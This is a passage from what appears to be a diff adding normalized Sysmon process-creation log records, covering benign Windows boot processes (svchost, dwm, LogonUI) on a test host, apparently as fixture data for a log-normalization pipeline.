"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1104", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.929Z", "type": "raw", "uuid": "9229848f-6f89-4778-979e-bd22327b3cec"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.4188169Z\"},\"EventRecordID\":\"27457\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.855\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010eac90000}\"},{\"Name\":\"ProcessId\",\"text\":\"636\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceNoNetwork -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010eac90000", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "636", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.855Z", "type": "raw", "uuid": "b1b49508-e8f6-47b7-b265-1f083081ebb4"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.2257296Z\"},\"EventRecordID\":\"27445\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.801\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00105fc20000}\"},{\"Name\":\"ProcessId\",\"text\":\"1020\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s gpsvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-00105fc20000", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1020", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.801Z", "type": "raw", "uuid": "a6977992-11cd-45e7-8c95-b809900d5c92"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.2115064Z\"},\"EventRecordID\":\"27442\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.785\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-001035c00000}\"},{\"Name\":\"ProcessId\",\"text\":\"1000\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\dwm.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.831 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Desktop Window Manager\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"dwm.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"dwm.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"Window 
Manager\\\\DWM-1\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020f6bf0000}\"},{\"Name\":\"LogonId\",\"text\":\"0xbff6\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=2371C02842FD9670FA47B2EAE4CB08FA7A6070C1,MD5=5CE3CCA35D8B19967B25806B7FF69D0F,SHA256=5954A267C8F271798EC0AC18D5F67F21A70B47258B10601511CA2109FFFDCF71,IMPHASH=CC05EDB80F10F1D5E7EC964B8C83F969\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-001096530000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"568\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\winlogon.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"winlogon.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020f6bf0000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "window manager", "object.account.id": "synthetic:dwm-1@window manager", "object.account.name": "dwm-1", "object.account.privileges": "System", "object.account.session_id": "49142", "object.process.cmdline": "\"dwm.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dwm.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-001035c00000", "object.process.hash.imphash": "CC05EDB80F10F1D5E7EC964B8C83F969", "object.process.hash.md5": 
"5CE3CCA35D8B19967B25806B7FF69D0F", "object.process.hash.sha1": "2371C02842FD9670FA47B2EAE4CB08FA7A6070C1", "object.process.hash.sha256": "5954A267C8F271798EC0AC18D5F67F21A70B47258B10601511CA2109FFFDCF71", "object.process.id": "1000", "object.process.meta": "Description:Desktop Window Manager | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dwm.exe", "object.process.original_name": "dwm.exe", "object.process.parent.cmdline": "winlogon.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\winlogon.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-001096530000", "object.process.parent.id": "568", "object.process.parent.name": "winlogon.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.831 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "window manager", "subject.account.id": "synthetic:dwm-1@window manager", "subject.account.name": "dwm-1", "subject.account.privileges": "System", "subject.account.session_id": "49142", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.785Z", "type": "raw", "uuid": "24bfdf27-1a6b-47c6-a0c3-51ffeb942c07"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.1987705Z\"},\"EventRecordID\":\"27438\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.783\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010debf0000}\"},{\"Name\":\"ProcessId\",\"text\":\"992\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\LogonUI.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Logon User Interface Host\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"logonui.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"LogonUI.exe\\\" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=E1AB36E5C3C1453C592E2901330EB13C5D29B351,MD5=33F89DD9629CB0422A2C17268376232D,SHA256=9358EF8CB7FB08581D74274005263BD8FA2E6E0FC443930B25FD345CF6CE9071,IMPHASH=B9B0B64B08B38276711093CA94348D39\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-001096530000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"568\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\winlogon.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"winlogon.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"LogonUI.exe\" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\logonui.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010debf0000", "object.process.hash.imphash": 
"B9B0B64B08B38276711093CA94348D39", "object.process.hash.md5": "33F89DD9629CB0422A2C17268376232D", "object.process.hash.sha1": "E1AB36E5C3C1453C592E2901330EB13C5D29B351", "object.process.hash.sha256": "9358EF8CB7FB08581D74274005263BD8FA2E6E0FC443930B25FD345CF6CE9071", "object.process.id": "992", "object.process.meta": "Description:Windows Logon User Interface Host | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "logonui.exe", "object.process.original_name": "logonui.exe", "object.process.parent.cmdline": "winlogon.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\winlogon.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-001096530000", "object.process.parent.id": "568", "object.process.parent.name": "winlogon.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.783Z", "type": "raw", "uuid": "235d64a0-e65a-45ee-8fad-e5575575c6bc"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:24.1944137Z\"},\"EventRecordID\":\"27420\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.578\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010fe6f0000}\"},{\"Name\":\"ProcessId\",\"text\":\"808\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k DcomLaunch -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010fe6f0000", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "808", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.578Z", "type": "raw", "uuid": "0c0563cc-4571-4247-b636-3900009868a0"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:24.1883985Z\"},\"EventRecordID\":\"27417\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.555\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00105b6c0000}\"},{\"Name\":\"ProcessId\",\"text\":\"732\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k DcomLaunch -p -s PlugPlay\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
